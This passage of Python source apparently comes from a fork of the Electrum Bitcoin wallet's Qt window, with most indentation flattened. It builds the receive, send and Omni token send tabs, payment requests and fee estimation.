buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
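        # Illustrative result (hypothetical values): the generated URI looks roughly like
        #   bitcoin:<address>?amount=0.001&message=...&time=1570000000&exp=86400&name=merchant.example&sig=<base58 signature>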
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_send_omni_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_omni_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def create_send_omni_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid1 = QGridLayout()
grid1.setSpacing(8)
grid1.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.amount_e1 = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Receiver'), msg)
grid1.addWidget(payto_label, 1, 0)
grid1.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid1.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid1.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid1.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid1.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid1.addWidget(amount_label, 4, 0)
grid1.addWidget(self.amount_e, 4, 1)
        msg = _('Property id of the Omni Layer token.') + '\n\n' \
              + _('The numeric id of the property (token) to send.') + ' ' \
              + _('Check whether Electrum is running on mainnet or testnet first.')
property_id_label = HelpLabel(_('PropertyId'), msg)
grid1.addWidget(property_id_label, 6, 0)
grid1.addWidget(self.amount_e1, 6, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid1.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
# grid1.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid1.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid1.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid1.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send_omni_tokens)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid1.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid1)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_omni_tab', grid1)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
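            # For instance, with a displayed rate of 1.5 sat/byte and an estimated
            # size of 225 bytes the displayed fee is round(1.5 * 225) = 338 sat,
            # while the coin chooser may settle on a slightly different actual fee;
            # that difference drives the fee-rounding icon further below.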
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
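        # Illustrative usage (hypothetical method name): the wrapper prompts for the
        # wallet password and injects it as the 'password' keyword argument.
        #
        #     @protected
        #     def do_something(self, arg, password):
        #         ...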
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
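            # e.g. a user-entered 5 sat/byte becomes 5000 sat/kB, the unit expected
            # by SimpleConfig.estimate_fee_for_feerate below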
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def read_send_omni_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
